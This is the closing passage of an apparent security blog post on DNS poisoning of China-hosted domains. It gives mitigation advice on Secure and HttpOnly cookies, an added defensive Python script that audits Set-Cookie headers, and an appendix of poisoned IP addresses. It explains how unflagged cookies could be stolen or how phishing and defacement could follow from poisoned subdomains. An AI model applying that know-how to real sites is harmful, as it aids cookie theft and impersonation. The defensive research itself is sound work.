These requirements mean that any business that wants to have an Internet presence in China must host its infrastructure in China and is thus susceptible to the DNS poisoning that we have highlighted in this post. While simply not operating in China would solve this, it is obviously not a realistic solution.
One solution would be to host your nameservers outside of China. While this would mitigate against the DNS poisoning it does present concerns around speed, reliability and general user experience for the Chinese users of these sites.
One thing that organizations can more easily control, and that will limit the impact of some of the issues demonstrated in this post, is to ensure that basic web security hygiene is implemented. This means ensuring that all cookies have the “Secure” flag, so that they are never sent to web servers that are not being communicated with over HTTPS/TLS. Enforcing the “HTTPOnly” flag on all cookies means that a simple XSS vulnerability cannot be escalated to steal sensitive cookies.
Unfortunately, while basic web security hygiene goes a long way towards mitigating the attacks presented here, defacement and phishing still pose a real and exploitable risk.
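The cookie hygiene just described, as an added Python example (not code from the post): it parses Set-Cookie headers and reports cookies that a poisoned sibling subdomain reached over plain HTTP would receive, or that script on such a subdomain could read. The SAMPLE_HEADERS and the target.tld domain are constructed for the example; the host-only rule (a cookie with no Domain attribute is sent only to the host that set it) comes from RFC 6265, not from the post.

```python
"""Audit Set-Cookie headers for the Secure and HttpOnly flags.

Added example, not code from the Assetnote post. For each cookie it reports
whether an attacker-controlled origin under the same parent domain (the
situation created by the poisoning described above) could obtain it: without
Secure, the browser includes the cookie in plain-HTTP requests such as the
poisoned image loads; without HttpOnly, script on that origin can read it.
"""
from typing import Dict, List, Tuple

# Constructed sample headers: a careless session cookie scoped to the whole
# domain, a hardened CSRF cookie, and a host-only preference cookie.
SAMPLE_HEADERS = [
    "session=abc123; Path=/; Domain=.target.tld",
    "csrf=tok; Path=/; Domain=.target.tld; Secure; HttpOnly; SameSite=Lax",
    "pref=dark; Path=/",
]


def parse_set_cookie(header_value: str) -> Tuple[str, Dict[str, str]]:
    """Split one Set-Cookie value into (cookie name, {attribute: value}).
    Attribute names are case-insensitive; flags without a value map to 'true'."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0].strip()
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip() or "true"
    return name, attrs


def audit_cookie(header_value: str) -> List[str]:
    """Missing-flag findings for one cookie, naming the hosts it would leak to."""
    name, attrs = parse_set_cookie(header_value)
    # A cookie without a Domain attribute is host-only (RFC 6265) and is never
    # sent to sibling subdomains; a Domain-scoped one reaches every host under it.
    domain = attrs.get("domain")
    reach = f"every host under {domain}" if domain else "its own host only"
    issues = []
    if "secure" not in attrs:
        issues.append(f"{name}: missing Secure (sent over plain HTTP to {reach})")
    if "httponly" not in attrs:
        issues.append(f"{name}: missing HttpOnly (readable by script on {reach})")
    return issues


def exposed_to_subdomain_takeover(header_value: str) -> bool:
    """True when a poisoned sibling subdomain reached over plain HTTP would be
    sent this cookie: Domain-scoped and not Secure. Secure cookies stay out of
    reach of both vectors, as the post notes; HttpOnly then only decides whether
    script, rather than just the attacker's origin, can read what arrives."""
    _, attrs = parse_set_cookie(header_value)
    return "domain" in attrs and "secure" not in attrs


def audit_response(set_cookie_headers: List[str]) -> List[str]:
    """Findings for every Set-Cookie header of one HTTP response."""
    return [issue for header in set_cookie_headers for issue in audit_cookie(header)]


if __name__ == "__main__":
    for line in audit_response(SAMPLE_HEADERS):
        print(line)
    for header in SAMPLE_HEADERS:
        print(header.split("=", 1)[0], "exposed:", exposed_to_subdomain_takeover(header))
```

Run against the real Set-Cookie headers of an application (for example captured from a login response) to see which cookies the two vectors above could actually obtain; the Domain attribute is what decides whether a randomly named poisoned subdomain is in scope at all.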
Special Thanks
Eric Head (todayisnew) for sharing additional keywords and research related to this DNS poisoning attack.
Sean Yeoh for help with the data analysis of returned poisoned IP addresses.
Our customers of Assetnote who contributed valuable insights into this attack and the difficulties in mitigating the issue.
Appendix: Known Poisoned IP Addresses
103.200.30.143
103.200.31.172
103.214.168.106
103.226.246.99 org-name: RADIOACTIVE PTE. LTD.
103.228.130.27
103.228.130.61
103.230.123.190
103.240.180.117
103.240.182.55
103.246.246.144 org-name: Cloudie Limited
103.252.114.101 org-name: Twitter Asia Pacific Pte. Ltd.
103.252.114.11 org-name: Twitter Asia Pacific Pte. Ltd.
103.252.114.61 org-name: Twitter Asia Pacific Pte. Ltd.
103.252.115.153 org-name: Twitter Asia Pacific Pte. Ltd.
103.252.115.169 org-name: Twitter Asia Pacific Pte. Ltd.
103.252.115.221 org-name: Twitter Asia Pacific Pte. Ltd.
103.252.115.49 org-name: Twitter Asia Pacific Pte. Ltd.
103.252.115.53 org-name: Twitter Asia Pacific Pte. Ltd.
103.252.115.59 org-name: Twitter Asia Pacific Pte. Ltd.
103.39.76.66 org-name: HONG KONG ALPHA INTL LTD
103.42.176.244
103.56.16.112
103.73.161.52 org-name: Cache Tele Limited
103.97.176.73 org-name: HONGKONG CLOUD NETWORK TECHNOLOGY CO., LIMITED
103.97.3.19 org-name: HK Kwaifong Group Limited
104.16.251.55 OrgName: Cloudflare, Inc.
Testing Tool
Do you have any domains that are routed through China that you want to test?
Enter the domain you would like to test, e.g. domain.cn, and we will let you know whether it is vulnerable to the attack vectors described in this blog post.
Written by:
Shubham Shah